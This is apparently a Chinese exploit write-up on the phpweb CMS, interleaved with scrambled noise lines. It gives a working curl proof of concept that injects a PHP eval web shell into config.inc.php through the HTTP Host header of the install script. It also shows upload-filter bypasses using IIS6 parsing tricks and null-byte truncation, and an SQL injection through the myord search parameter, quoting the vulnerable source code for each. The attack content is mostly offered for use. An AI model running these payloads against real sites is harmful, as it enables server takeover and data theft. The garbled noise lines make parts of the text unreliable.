phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

5 S" ~% G9 B9 e, M, K! n之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

. b  d: c* H* y4 Q% o% c鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
8 u0 B9 J8 s4 }  J+ l6 \鸡肋2： 有一定安全常识的站长都会删掉 install 目录

( J" W' p9 q( o3 M2 [虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响
; B2 S8 T3 \. V, n& ^
' D: J4 q. h* G( ?- J% E, t5 D分析：
2 e& t  t/ b0 Q/ U+ F' U

$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

# g& g) G/ ^9 C- k. s8 j                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
  m1 b& n1 ^- [; \, S+ @8 _/ a                                            $filestr=str_replace(" ","",$filestr);
# m% e5 `% g; b1 O! a9 S                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
( _' C5 ]# _4 s" {  w6 K+ ?
                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

: `8 r2 ]% Y; wpoc：
' Q8 U: h& L( I6 F
. u/ \" w/ ]+ {?
1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
5 a  U" H* ?: y4 l跟之前的 phpcms一样 需要远程数据库
" i  ~9 U' d& ~$ r  p; ]
——————————————————–
上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
! v3 W: A0 V* f" v( v7 s

<?php
    define("ROOTPATH", "../../");
- m& W% P! U. R/ o* r    include(ROOTPATH."includes/admin.inc.php");
& A& ^9 c) P- A% q6 \    NeedAuth(0);
; F# h" `0 ?, |: w' p$ r# l
    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
" T: c& x. @; `# `: V1 p, Q2 _    }
, ]. R$ b" n# g# N, {: h! ?8 j
# ?& _/ M4 i7 b+ k+ Z2 a' ]    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
/ j( S1 e6 H. O# t    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

    //最大文件大小
' C2 s( {( P8 [# x7 F0 t" |    $max_size = 1000000;
0 W5 T3 [, D4 y) E7 ~
    //更改目录权限
    @mkdir($save_path, 0777);

    //文件的全部路径
, s0 q2 Q4 U+ O2 q    $file_path = $save_path.$_POST['fileName'];   //保存文件名
8 Y$ }. V6 T( E5 I: n$ ~6 \
, C5 O8 X3 C0 }8 }# @    //文件URL
. M+ [) S& o- _8 N4 K: g/ T% J    $file_url = $save_url.$_POST['fileName'];
  n% A$ C. \2 k* m/ g) n* L//有上传文件时
, |7 Y; D4 [% E$ M. g" C* n    if (empty($_FILES) === false) {

* T/ y- y. ?4 t8 A6 `3 Z. a            //原文件名
            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
! x9 J2 Z+ x5 E+ D# b3 h            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
            $file_size = $_FILES['fileData']['size'];
( N% X( R+ n2 n( W            //检查目录
$ I, p/ A/ \' |: O; h$ n* ?            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
4 q/ _$ v, d" P/ H( [% k            }
5 X* D  t1 w. D9 K, w            //检查目录写权限
- u. D2 A! z0 }/ _2 d' i9 a( B            if (@is_writable($save_path) === false) {
1 Z' S* L: r! }, d% C' H                    alert("上传目录没有写权限。");
            }
            //检查是否已上传
2 E. O9 D8 N4 y5 ^- E- m            if (@is_uploaded_file($tmp_name) === false) {
$ D  S' y9 B, m7 ^  z                    alert("临时文件可能不是上传文件。");
            }
1 O. u5 V. V  c: v, s0 |5 [8 [7 l9 R            //检查文件大小
' t2 R& n/ x) N7 [: G9 q/ J            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
            //获得文件扩展名
, j; D  l" u. ^+ Z/ T            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
2 Y4 e+ N5 g- o( ]2 f$ {            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);
$ Z" j% A* B3 j1 M8 b3 T) r1 B
            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
" x* B5 Y# O( a6 d. e" p                    alert("上传文件扩展名是不允许的扩展名。");
/ c* w# \4 g: I3 P: v            }

            //移动文件   
; X7 j$ m& J4 f* W) _4 m            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
4 j' |+ F5 D" R: k  O7 W            if (move_uploaded_file($tmp_name, $file_path) === false) {
- B" g6 X! X# e% ?5 K# Q                    alert("上传文件失败。");
2 L6 M) U5 A/ p; k: K- F+ v7 ?2 w* e            }

            @chmod($file_path,0666);

    ?>
抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

9 q2 E8 |# V- E& l9 u) v" \2 a. ?——————————————————
注入漏洞：
& A3 C  B' u) m( A6 v" d9 b5 b漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]


$ d( F+ K2 b: f<?php
   //       ... 省略 n 行...
- b5 W1 C% \2 ?9 E" |, y   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
6 A0 P. g* C- a
. O) F( }/ r2 q) ]' o6 P2 o" O   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
$ r* _  A  r3 }5 Z   //第47行 $key:

   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
5 H' k! L3 ^; G2 C
5 B& i4 f) N8 a' y/ l! K   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入

# q; i4 \; {$ l) N# u8 q- L   ?>